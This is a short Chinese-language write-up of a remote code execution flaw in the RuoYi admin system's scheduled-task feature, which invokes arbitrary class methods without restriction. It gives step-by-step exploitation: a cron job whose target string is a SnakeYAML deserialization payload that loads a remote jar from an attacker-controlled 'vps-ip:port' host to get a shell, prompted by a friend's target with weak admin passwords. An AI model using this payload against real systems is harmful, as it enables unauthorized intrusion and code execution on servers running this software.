0x00 前言
此漏洞源于一个朋友遇到了这个系统,后台有弱口令,问能不能shell
开始审计,先看官方文档,发现作者在文档中写明了历史漏洞,告诫了用户使用风险,还算是良心了
https://doc.ruoyi.vip/ruoyi/document/kslj.html#%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E
重点是shell,且目标为当时最新版本,历史漏洞已经无法用了,由于有后台权限,搭建了系统在后台浏览了一下功能,发现存在一个任务调度的功能
根据添加调度任务的url定位到代码,最终定位到任务执行代码:
可以看到代码无任何黑白名单限制,直接动态调用任意类任意方法
摸一下依赖有snakeyaml
便想着用artsploit攻击spring-cloud 的那一套思路(https://github.com/artsploit/yaml-payload)
0x01 漏洞利用
位置:系统监控->定时任务->添加任务
任务名称 :随便填
调用目标字符串:
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vps-ip:port/yaml-payload.jar"]]]]')
cron表达式: 0/50 * * * * ? (随便填)
执行策略: 执行一次
状态:正常
成功getshell
利用思路有很多,抛砖引玉了。
0x02 总结
漏洞未在最新4.6.1版本上试过,代码如果没改的话,理论上都是可以的。